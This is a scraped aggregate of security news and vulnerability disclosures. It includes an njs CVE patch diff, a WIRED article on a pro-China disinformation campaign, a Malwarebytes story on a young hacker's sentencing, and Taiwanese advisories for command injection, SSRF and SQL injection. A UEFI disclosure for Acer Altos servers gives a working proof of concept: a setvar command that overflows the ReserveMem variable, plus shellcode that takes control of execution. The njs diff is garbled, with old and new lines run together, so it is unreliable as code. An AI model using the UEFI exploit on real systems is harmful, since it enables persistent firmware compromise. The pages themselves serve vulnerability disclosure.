Nginx NJS v0.7.2 was discovered to contain a heap-use-after-free bug caused by illegal memory copy in the function njs_json_parse_iterator_call at njs_json.c.

@@ -28,27 +28,17 @@ typedef struct { int64\_t length; njs\_array\_t \*keys; njs\_value\_t \*key; njs\_object\_prop\_t \*prop; njs\_value\_t prop; } njs\_json\_state\_t;  
  
typedef struct { njs\_value\_t retval;  
njs\_uint\_t depth; #define NJS\_JSON\_MAX\_DEPTH 32 njs\_json\_state\_t states\[NJS\_JSON\_MAX\_DEPTH\];  
njs\_function\_t \*function; } njs\_json\_parse\_t;  
  
typedef struct { njs\_value\_t retval;  
njs\_vm\_t \*vm;  
njs\_uint\_t depth; #define NJS\_JSON\_MAX\_DEPTH 32 njs\_json\_state\_t states\[NJS\_JSON\_MAX\_DEPTH\];  
njs\_value\_t replacer; @@ -72,10 +62,9 @@ njs\_inline uint32\_t njs\_json\_unicode(const u\_char \*p); static const u\_char \*njs\_json\_skip\_space(const u\_char \*start, const u\_char \*end);  
static njs\_int\_t njs\_json\_parse\_iterator(njs\_vm\_t \*vm, njs\_json\_parse\_t \*parse, njs\_value\_t \*value); static njs\_int\_t njs\_json\_parse\_iterator\_call(njs\_vm\_t \*vm, njs\_json\_parse\_t \*parse, njs\_json\_state\_t \*state); static njs\_int\_t njs\_json\_internalize\_property(njs\_vm\_t \*vm, njs\_function\_t \*reviver, njs\_value\_t \*holder, njs\_value\_t \*name, njs\_int\_t depth, njs\_value\_t \*retval); static void njs\_json\_parse\_exception(njs\_json\_parse\_ctx\_t \*ctx, const char \*msg, const u\_char \*pos);  
@@ -108,15 +97,13 @@ njs\_json\_parse(njs\_vm\_t \*vm, njs\_value\_t \*args, njs\_uint\_t nargs, njs\_index\_t unused) { njs\_int\_t ret; njs\_value\_t \*text, value, lvalue; njs\_value\_t \*text, value, lvalue, wrapper; njs\_object\_t \*obj; const u\_char \*p, \*end; njs\_json\_parse\_t \*parse, json\_parse; const njs\_value\_t \*reviver; njs\_string\_prop\_t string; njs\_json\_parse\_ctx\_t ctx;  
parse = &json\_parse;  
text = njs\_lvalue\_arg(&lvalue, args, nargs, 1);  
if (njs\_slow\_path(!njs\_is\_string(text))) { @@ -156,11 +143,16 @@ njs\_json\_parse(njs\_vm\_t \*vm, njs\_value\_t \*args, njs\_uint\_t nargs,  
reviver = njs\_arg(args, nargs, 2);  
if (njs\_slow\_path(njs\_is\_function(reviver) && njs\_is\_object(&value))) { parse->function = njs\_function(reviver); parse->depth = 0; if (njs\_slow\_path(njs\_is\_function(reviver))) { obj = njs\_json\_wrap\_value(vm, &wrapper, &value); if (njs\_slow\_path(obj == NULL)) { return NJS\_ERROR; }  
return njs\_json\_parse\_iterator(vm, parse, &value); return njs\_json\_internalize\_property(vm, njs\_function(reviver), &wrapper, njs\_value\_arg(&njs\_string\_empty), 0, &vm->retval); }  
vm->retval = value; @@ -851,195 +843,106 @@ njs\_json\_skip\_space(const u\_char \*start, const u\_char \*end) }  
  
static njs\_json\_state\_t \* njs\_json\_push\_parse\_state(njs\_vm\_t \*vm, njs\_json\_parse\_t \*parse, njs\_value\_t \*value) { njs\_json\_state\_t \*state;  
if (njs\_slow\_path(parse->depth >= NJS\_JSON\_MAX\_DEPTH)) { njs\_type\_error(vm, "Nested too deep or a cyclic structure"); return NULL; }  
state = &parse->states\[parse->depth++\]; state->value = \*value; state->index = 0; state->prop = NULL; state->keys = njs\_value\_own\_enumerate(vm, value, NJS\_ENUM\_KEYS, NJS\_ENUM\_STRING, 0); if (state->keys == NULL) { return NULL; }  
return state; }  
  
njs\_inline njs\_json\_state\_t \* njs\_json\_pop\_parse\_state(njs\_vm\_t \*vm, njs\_json\_parse\_t \*parse) { njs\_json\_state\_t \*state;  
state = &parse->states\[parse->depth - 1\]; njs\_array\_destroy(vm, state->keys); state->keys = NULL;  
if (parse->depth > 1) { parse->depth\--; return &parse->states\[parse->depth - 1\]; }  
return NULL; }  
  
static njs\_int\_t njs\_json\_parse\_iterator(njs\_vm\_t \*vm, njs\_json\_parse\_t \*parse, njs\_value\_t \*object) njs\_json\_internalize\_property(njs\_vm\_t \*vm, njs\_function\_t \*reviver, njs\_value\_t \*holder, njs\_value\_t \*name, njs\_int\_t depth, njs\_value\_t \*retval) { njs\_int\_t ret; njs\_value\_t \*key, wrapper; njs\_object\_t \*obj; njs\_json\_state\_t \*state; njs\_object\_prop\_t \*prop; njs\_property\_query\_t pq; int64\_t k, length; njs\_int\_t ret; njs\_value\_t val, new\_elem, index; njs\_value\_t arguments\[3\]; njs\_array\_t \*keys;  
obj = njs\_json\_wrap\_value(vm, &wrapper, object); if (njs\_slow\_path(obj == NULL)) { if (njs\_slow\_path(depth++ >= NJS\_JSON\_MAX\_DEPTH)) { njs\_type\_error(vm, "Nested too deep or a cyclic structure"); return NJS\_ERROR; }  
state = njs\_json\_push\_parse\_state(vm, parse, &wrapper); if (njs\_slow\_path(state == NULL)) { ret = njs\_value\_property(vm, holder, name, &val); if (njs\_slow\_path(ret == NJS\_ERROR)) { return NJS\_ERROR; }  
for ( ;; ) { if (state->index < state->keys\->length) { njs\_property\_query\_init(&pq, NJS\_PROPERTY\_QUERY\_SET, 0);  
key = &state->keys\->start\[state->index\];  
ret = njs\_property\_query(vm, &pq, &state->value, key); if (njs\_slow\_path(ret != NJS\_OK)) { if (ret == NJS\_DECLINED) { state->index++; continue; } keys = NULL;  
if (njs\_is\_object(&val)) { if (!njs\_is\_array(&val)) { keys = njs\_array\_keys(vm, &val, 0); if (njs\_slow\_path(keys == NULL)) { return NJS\_ERROR; }  
prop = pq.lhq.value;  
if (prop->type == NJS\_WHITEOUT) { state->index++; continue; }  
state->prop = prop; for (k = 0; k < keys->length; k++) { ret = njs\_json\_internalize\_property(vm, reviver, &val, &keys->start\[k\], depth, &new\_elem);  
if (prop->type == NJS\_PROPERTY && njs\_is\_object(&prop->value)) { state = njs\_json\_push\_parse\_state(vm, parse, &prop->value); if (state == NULL) { return NJS\_ERROR; if (njs\_slow\_path(ret != NJS\_OK)) { goto done; }  
continue; } if (njs\_is\_undefined(&new\_elem)) { ret = njs\_value\_property\_delete(vm, &val, &keys->start\[k\], NULL, 0);  
if (prop->type == NJS\_PROPERTY\_REF && njs\_is\_object(prop->value.data.u.value)) { state = njs\_json\_push\_parse\_state(vm, parse, prop->value.data.u.value); if (state == NULL) { return NJS\_ERROR; } else { ret = njs\_value\_property\_set(vm, &val, &keys->start\[k\], &new\_elem); }  
continue; if (njs\_slow\_path(ret == NJS\_ERROR)) { goto done; } }  
} else { state = njs\_json\_pop\_parse\_state(vm, parse); if (state == NULL) { vm->retval = parse->retval; return NJS\_OK; } }  
ret = njs\_json\_parse\_iterator\_call(vm, parse, state); if (njs\_slow\_path(ret != NJS\_OK)) { return ret; } } }  
  
static njs\_int\_t njs\_json\_parse\_iterator\_call(njs\_vm\_t \*vm, njs\_json\_parse\_t \*parse, njs\_json\_state\_t \*state) { njs\_int\_t ret; njs\_value\_t arguments\[3\], \*value; njs\_object\_prop\_t \*prop;  
prop = state->prop;  
arguments\[0\] = state->value; arguments\[1\] = state->keys\->start\[state->index++\];  
switch (prop->type) { case NJS\_PROPERTY: arguments\[2\] = prop->value; ret = njs\_object\_length(vm, &val, &length); if (njs\_slow\_path(ret == NJS\_ERROR)) { return NJS\_ERROR; }  
ret = njs\_function\_apply(vm, parse->function, arguments, 3, &parse->retval); if (njs\_slow\_path(ret != NJS\_OK)) { return ret; } for (k = 0; k < length; k++) { ret = njs\_int64\_to\_string(vm, &index, k); if (njs\_slow\_path(ret != NJS\_OK)) { return NJS\_ERROR; }  
if (njs\_is\_undefined(&parse->retval)) { prop->type = NJS\_WHITEOUT; ret = njs\_json\_internalize\_property(vm, reviver, &val, &index, depth, &new\_elem);  
} else { prop->value = parse->retval; } if (njs\_slow\_path(ret != NJS\_OK)) { return NJS\_ERROR; }  
break; if (njs\_is\_undefined(&new\_elem)) { ret = njs\_value\_property\_delete(vm, &val, &index, NULL, 0);  
case NJS\_PROPERTY\_REF: value = prop->value.data.u.value; arguments\[2\] = \*value; } else { ret = njs\_value\_property\_set(vm, &val, &index, &new\_elem); }  
ret = njs\_function\_apply(vm, parse->function, arguments, 3, &parse->retval); if (njs\_slow\_path(ret != NJS\_OK)) { return ret; if (njs\_slow\_path(ret == NJS\_ERROR)) { return NJS\_ERROR; } } } }  
if (njs\_is\_undefined(&parse->retval)) { ret = njs\_value\_property\_i64\_delete(vm, &state->value, state->index - 1, NULL);  
} else { ret = njs\_value\_property\_i64\_set(vm, &state->value, state->index - 1, &parse->retval); } njs\_value\_assign(&arguments\[0\], holder); njs\_value\_assign(&arguments\[1\], name); njs\_value\_assign(&arguments\[2\], &val);  
if (njs\_slow\_path(ret == NJS\_ERROR)) { return NJS\_ERROR; } ret = njs\_function\_apply(vm, reviver, arguments, 3, retval);  
break; done:  
default: njs\_internal\_error(vm, "njs\_json\_parse\_iterator\_call() unexpected " "property type:%s", njs\_prop\_type\_string(prop->type)); if (keys != NULL) { njs\_array\_destroy(vm, keys); }  
return NJS\_OK; return ret; }

CVE-2022-43286: Fixed JSON.parse() when reviver function is provided. · nginx/njs@2ad0ea2

Multiple command injection vulnerabilities in GL.iNet GoodCloud IoT Device Management System Version 1.00.220412.00 via the ping and traceroute tools allow attackers to read arbitrary files on the system.

CVE-2022-42055: GL.iNET MT300N-V2 Vulnerabilities and Hardware Teardown

The implementation of backslash parsing in the Dart URI class for versions prior to 2.18 and Flutter versions prior to 3.30 differs from the WhatWG URL standards. Dart uses the RFC 3986 syntax, which creates incompatibilities with the '\' characters in URIs, which can lead to auth bypass in webapps interpreting URIs. We recommend updating Dart or Flutter to mitigate the issue.

CVE-2022-3095: sdk/CHANGELOG.md at master · dart-lang/sdk

The suspected Chinese influence operation had limited success. But it signals a growing threat from a new disinformation adversary.

Since Russia bombarded the 2016 election with Twitter trolls and astroturfed lies, election watchers have been on guard against social media “influence operations.” Four years later, Iran took a stab at meddling in the 2020 presidential election, with more mixed results. Now, the People's Republic of China—or, at least, a group with a long-running pro-Chinese government agenda—seems to be trying out its own political influence operation just ahead of this year's US midterm elections. And while that operation seems to have largely failed this time, the campaign represents the growing boldness of a new adversary in the fight against organized disinformation.

On Wednesday, cybersecurity and threat intelligence firm Mandiant published new findings about a group it calls Dragonbridge, which it's seen for years promoting pro-Chinese interests in fake grassroots social media campaigns designed to influence politics in Taiwan and Hong Kong. Now, Mandiant's analysts have tied Dragonbridge to a series of more US-focused influence campaigns. The group claimed that a notorious hacking spree carried out by known Chinese state-sponsored hackers was actually carried out by US intelligence, falsely blamed the sabotage of the Nord Stream pipeline on the US government, and—perhaps most brazenly—seeded hundreds of posts on social media designed to demoralize voters and reduce turnout ahead of the November midterms.

“This actor has been rapidly growing and hyper-aggressive. They went from carrying out limited campaigns focused on Hong Kong to a global operation on dozens of platforms,” says John Hultquist, Mandiant's VP of intelligence analysis. “Interfering in our elections is just another line that they're clearly willing to cross.”

Mandiant declined to reveal in its report or to WIRED the full collection of disinformation posts that it's tied to Dragonbridge, but the company says the posts numbered in the thousands. Nor would Mandiant name all the platforms where Dragonbridge had created accounts. But it describes posts published by these accounts arguing that American democracy was being taken over by extreme partisanship, as well as posts pointing to episodes of confrontations and violence between political groups and against the FBI as instances of “civil war.” The group also published a video, Mandiant says, that discourages Americans from voting, making claims about political gridlock and inaction and showing images of the January 6, 2021, insurrection at the US Capitol Building. “The solution to America’s ills is not to vote for someone,” the video argues at one point, according to Mandiant, but “to root out this ineffective and incapacitated system.” All of the content Mandiant identified in its report as part of the Dragonbridge operations has since been deleted, the company says.

Other simultaneous influence campaigns from the group tie it more evidently to Chinese government interests. Pseudonymous Twitter accounts that Mandiant says were controlled by Dragonbridge posted claims in both English and Mandarin stating that espionage campaigns carried out by the prolific China-linked hacker group APT41 were really the work of the NSA and CIA. “For at least ten years, the American hacker group \[APT41\] has repeatedly carried out cyber attacks, espionage activities, cyber piracy and cyber crimes against other countries,” reads one tweet in October from a seemingly fictional person named Karen Diaz.

In fact, the US Department of Justice indicted seven Chinese men in 2020 as members of APT41, tying them to a contractor working on behalf of China's Ministry of State Security known as Chengdu 404. The indictment accuses the men of hacking hundreds of targets around the globe, both to carry out espionage on behalf of the MSS and to profit from their own cybercrime operations.

In an attempt to shift that blame, Dragonbridge's influence campaign went so far as to create spoofed posts from Intrusion Truth, a mysterious pseudonymous Twitter account that has previously released evidence tying multiple hacking campaigns to China, including those of APT41. The fake Intrusion Truth posts instead falsely tie APT41 to US hackers. Dragonbridge also created an altered, spoofed version of an article in the Hong Kong news outlet _Sing Tao Daily_ pinning APT41's activities on the US government.

In a more timely example of Dragonbridge's disinformation operations, it also sought to blame the destructive sabotage of the Nord Stream natural gas pipeline—a key piece of infrastructure connecting European countries to Russian gas sources—on the United States. Mandiant says that claim, which echoes statements from Russian president Vladimir Putin and Russian disinformation sources, appears to be part of a larger campaign designed to sow divisions between the United States and its allies that have opposed and sanctioned Russia for its unprovoked and catastrophic military invasion of Ukraine.

None of those campaigns, Mandiant emphasizes, was particularly successful. Most of the posts had single-digit likes, retweets, or comments at best, the company says. Some of its spoofed tweets impersonating Intrusion Truth have no signs of engagement at all. But Hultquist warns nonetheless that Dragonbridge demonstrates a new interest in aggressive disinformation from pro-China sources, and possibly from China itself. He worries, given China's widespread cyber intrusions around the world, that future Chinese disinformation campaigns might include hack-and-leak operations that blend real revelations into disinformation campaigns, as Russia's GRU military intelligence agency has done. “If they get their hands on some real information from a hacking operation,” Hultquist says, “that's where they become especially dangerous.”

Despite Dragonbridge's occasional pro-Russian messages, Hultquist says that Mandiant has little doubt of the group's pro-China focus. The company first spotted Dragonbridge engaged in a fake grassroots campaign to disparage Hong Kong pro-democracy protestors in 2019. Earlier this year, it saw the group pose as Americans protesting against US rare-earth metal mining companies that competed with Chinese firms.

That doesn't mean Dragonbridge's campaigns are necessarily the work of a Chinese government agency or even a contractor firm like Chengdu 404. But they're very likely at least located in China, Hultquist says. “It's hard to imagine their activity, in its totality, being in any other country's interest,” says Hultquist.

If Dragonbridge is working directly for the Chinese government, it may mark a new phase in China's use of disinformation. In the past, China has largely stayed away from influence operations. A Director of National Intelligence report on foreign threats to the 2020 election declassified last year stated that China “considered but did not deploy influence efforts designed to change the outcome of the US Presidential election.” But just last month Facebook, too, says it spotted and removed campaigns of Chinese political disinformation posted to the platform from mid-2021 to September 2022, though it didn't say if the campaigns were linked to Dragonbridge.

Despite the apparent resources put into Dragonbridge's long-running operations, its new foray into election meddling looks remarkably ham-fisted, says Thomas Rid, a professor of strategic studies at Johns Hopkins and author of a history of disinformation, _Active Measures_. He points to abstract phrases, like its call to “root out this ineffective and incapacitated system.” That kind of dull language fails to effectively exploit real wedge issues to exacerbate existing divisions in US society—often best identified by local agents on the ground. “It seems like they didn’t read the manual,” Rid says. “It seems like a remote, amateurish affair done from Beijing.”

But both Rid and Mandiant's Hultquist agree that Dragonbridge's relative lack of success shouldn't be seen as a sign of Americans' growing immunity to influence operations. In fact, they argue that the deep political divisions in American society may mean that the US is less equipped than ever to distinguish fact from fabrication in social media. “Authoritative sources are no longer trusted,” says Hultquist. “I'm not sure that we're in a great place right now, as a country, to digest that some major information operation is attributable to a foreign power.”

A Pro-China Disinfo Campaign Is Targeting US Elections—Badly

AlphaBay was the largest online drug bazaar in history, run by a technological mastermind who seemed untouchable—until his tech was turned against him.

The Hunt for the Dark Web’s Biggest Kingpin, Part 1: The Shadow

Categories: News
Tags: food

Tags:  medical

Tags:  nhs

Tags:  gousto

Tags:  compromise

Tags:  laptop

Tags:  vouchers

Peter Foy racked up a peculiar list of compromises before being brought to justice



(Read more...)




The post An odd kind of cybercrime: Gift vouchers, medical records, and...food appeared first on Malwarebytes Labs.

Someone with a gift for technology but a nasty habit of using it for very bad things has been spared from going to jail with a suspended sentence. Peter Foy, 18 at the time of his antics, racked up a remarkable, and slightly peculiar, list of compromises before being brought before the court.

**A strange combination**

According to Brighton and Hove news, his spree began in 2019 with the initial purchase of a laptop from Amazon, bought with “fake Honey gift vouchers”. I would love to know more about how this initial foray into system compromise worked, as one would imagine purchasing anything with fake vouchers would be a bit of a tall order. Nevertheless, he did it, and from here a somewhat short life of crime beckoned.

From the South East Regional Organised Crime Unit:

> The court heard that on 13 October, 2019, Foy committed fraud in that he made a false representation to Amazon—that he was entitled to use gift vouchers to buy an Acer laptop. It was using this laptop that Foy committed further offences.

From this report, it’s hard to tell if the vouchers were indeed fake, or obtained without permission. His compromise modus operandi was a combination of breaking into networks run by food retailers, and breaking into networks containing confidential patient records. That’s quite a peculiar mixture.

On the one hand, he was “arranging food deliveries” at a cost of thousands to the affected businesses. On the other, he was accessing patient records of a third party company providing services to the National Health Service. As the release notes, this is during the COVID-19 pandemic, where the last thing we needed was people potentially breaking health record services. Food delivery services also played an important role during lockdown, so any disruption here would also be potentially very disruptive for those most at risk. A strange combination, then, but not a very pleasant one.

**Not quite Robin Hood**

Eventually, he was grabbed by the long arm of the law. None of the available information explains how this happened, but it's likely that a trail was left across the compromised businesses. Even a pro can slip up! One last roll of the dice for the defendant remained in the form of claiming that he was notifying and helping the organisations he compromised.

However, he “demanded financial rewards” from the victims, which isn’t how legitimate help works. If this was his version of a bug bounty program, it isn’t a very good one.

The attempt to downplay the crimes didn't impress the judge much, and he was sentenced to 18 months’ custody, suspended for two years. In addition to this, he’ll also have to perform 300 hours of unpaid work. There's no word if any sort of ban from using digital technology is included in any of this.

**A hopefully short-lived impact**

The details released on this set of attacks are unfortunately sparse, and perhaps not as specific as you’d expect. Detective Inspector Rob Bryant had this to say:

> This case also serves as a timely reminder to anyone using their financial details online to check the security of the data. Foy was able to gain access to many victims’ accounts as they often used the same passwords across more than one account.

The Detective Inspector also went on to suggest making use of two-factor authentication (2FA), which is great advice.

If you’re notified in the near future that you’ve been impacted, or indeed have been contacted already, here’s what you can do:

*   Take the advice on 2FA. Options include SMS, various apps, or even a physical hardware key. A FIDO2 hardware key is the best option.
*   Grab yourself a password manager. They create and remember strong passwords to prevent reuse, and many will refuse to sign in to bogus websites.
*   The various attacks outlined above likely resulted in the attacker seeing personal data he shouldn't. This could put those people at an increased risk of social engineering or identity theft.

An odd kind of cybercrime: Gift vouchers, medical records, and...food

Acer Altos W2000h-W570h F4 R01.03.0018 was discovered to contain a stack overflow in the RevserveMem component. This vulnerability allows attackers to cause a Denial of Service (DoS) via injecting crafted shellcode into the NVRAM variable.

There is a stack buffer overflow vulnerability, which could lead to **arbitrary code execution in UEFI DXE driver** in the latest firmware of Acer's Altos servers. And all these affecting models are already end of life. So we decided to disclose the detail.

**Summary**

Previously, we did a lot of research in existing works in UEFI security, an example is that Binarly-IO found a lot of vulnerabilities since last year. And there is also a paper in S&P2022 mainly focused on SMM callout vulnerabilities. We believe that the security of UEFI ecosystem remains construction, so we started to do some trivial works.

This vulnerability is similar to our another one,which exists due to the incorrect use of the gRT->GetVariable service in driver ReserveMem.

Affecting models: Altos W2000h-W570h F4, the latest update in 2019.02.13

**Vulnerability Description**

Vulnerability exists in function located offset 0x32c in ReserveMem.

The latest firmware can be downloaded here: link.

\_\_int64 \_\_fastcall sub\_32C(\_\_int64 a1, \_\_int64 a2)
{
  ... ...
  // v18 is at offset 0x28 the parent funciton's ret address
  \_\_int64 v18; // \[rsp+EE0h\] \[rbp+DE0h\]  
  DataSize = 1827i64;  // There is a hardcode datasize
  // the omitted code haven't change the "DataSize"
  ... ...
  // DataSize > sizeof(v18), which can cause stack overflow.
  if ( gRT\->GetVariable(aReservememflag, &gSetupVariableGuid, 0i64, &DataSize, &v18) || (\_BYTE)v19 != (\_BYTE)v18 )
  
  ... ...
  return 0i64;
}

The hardcoded DataSize parameter is much bigger than the buffer on the stack, and if an attacker modifies the variable's value by either physical or local way, it is possible to trigger a stacke-based buffer overflow and eventually overwrite the return address. We can exploit it by update the value of the NVARM variable ReserveMemFlag.

**Vulnerability Analysis**

We first wrote a PoC script, which overwrote the return address to "AAAA".

We can simply use a nsh script to set the variable's value:

setvar ReserveMemFlag -guid ec87d643-eba4-4bb5-a1e5-3f3e36b20da9 -bs -rt -nv \=4141414141414141...4141414141414141

After running the script, the variable ReserveMemFlag has been set to a large string full of "AAAA".

Using gdb to debug, we can see that when the entry function of the driver tries to return, the return address has been overflowed to our payload.

And because the variable is stored in the NVRAM, the next time we try to load the driver, the shellcode will still be triggered thus cause an exception.

Since we are able to control the **RIP**, we can further write shellcode in the stack. There isn't ALSR or NX in UEFI DXE phase, so it's quite simple to construct the shellcode to perform a call to ConOut->OutputString.

Our shellcode is as following.

mov eax, 0x79ee018  ; SystemTable
mov edx, 0x0a
mov r8, \[rax+0x40\]  ; SystemTable->ConOut
mov rcx, r8
call \[r8+0x28\]      ; SystemTable->ConOut->SetAttribute
mov eax, 0x79ee018
mov edx, 0x7e2c47a   ; The string need to Output
mov r8, \[rax+0x40\]
mov rcx, r8
call \[r8+0x8\]       ; SystemTable->ConOut->OutputString
ret
db "Pwned by 10TG", 0x0 ; UTF-16LE

Run the script to set variable and load the driver; we can see that the control flow is hijacked and we successfully print a string.

In conclusion, an attacker can exploit this vulnerability to **execute arbitrary code in UEFI DXE phase**.

A **malicious code can be installed** which could **survive across an operating system (OS) boot process** and modify NVRAM area in SPI flash storage (to gain persistence on target platform).

**Credit**

This vulnerability credited to river-li(Zichuan Li) and cft789(Fangtao Cao) from Wuhan University.

CVE-2022-41415: vulnerabilities/CVE-2022-41415.md at main · 10TG/vulnerabilities

RAVA certificate validation system has insufficient filtering for special parameter of the web page input field. A remote attacker with administrator privilege can exploit this vulnerability to perform arbitrary system command and disrupt service.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202209013

CVE ID

CVE-2022-39057

CVSS

7.2 (High)  
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

影響產品

全景軟體 RAVA憑證驗證系統網站 v3

問題描述

RAVA憑證驗證系統網站特定頁面欄位未對特殊參數作過濾，遠端攻擊者以管理者權限登入後，即可利用此漏洞進行Command Injection攻擊，執行系統任意指令，並對系統進行任意操作或中斷服務。

解決方法

請與全景軟體聯繫提供修補方案

漏洞通報者

Amos Tsai蔡啟仁 (Acer Cyber Security Inc., ACSI)

公開日期

2022-10-18

CVE-2022-39057: 全景軟體 RAVA憑證驗證系統網站 - Command Injection

RAVA certificate validation system has inadequate filtering for URL parameter. An unauthenticated remote attacker can perform SSRF attack to discover internal network topology base on query response.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202209011

CVE ID

CVE-2022-39055

CVSS

5.3 (Medium)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

影響產品

全景軟體 RAVA憑證驗證系統網站 v3

問題描述

RAVA憑證驗證系統網站特定URL參數未作恰當的過濾，遠端攻擊者不須權限，即可進行SSRF攻擊，透過回傳的錯誤訊息判斷目標網址狀態，藉以探測內網狀態。

解決方法

請與全景軟體聯繫提供修補方案

漏洞通報者

Jay Wu吳瑋杰 (Acer Cyber Security Inc., ACSI)

公開日期

2022-10-18

CVE-2022-39055: 全景軟體 RAVA憑證驗證系統網站 - Server-Side Request Forgery (SSRF)

RAVA certificate validation system has insufficient validation for user input. An unauthenticated remote attacker can inject arbitrary SQL command to access, modify and delete database.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202209012

CVE ID

CVE-2022-39056

CVSS

9.8 (Critical)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

影響產品

全景軟體 RAVA憑證驗證系統網站 v3

問題描述

RAVA憑證驗證系統網站特定功能參數未對使用者輸入進行驗證，遠端攻擊者不須權限，即可注入任意SQL語法讀取、修改及刪除資料庫。

解決方法

請與全景軟體聯繫提供修補方案

漏洞通報者

Amos Tsai蔡啟仁 (Acer Cyber Security Inc., ACSI)

公開日期

2022-10-18

Tag

#acer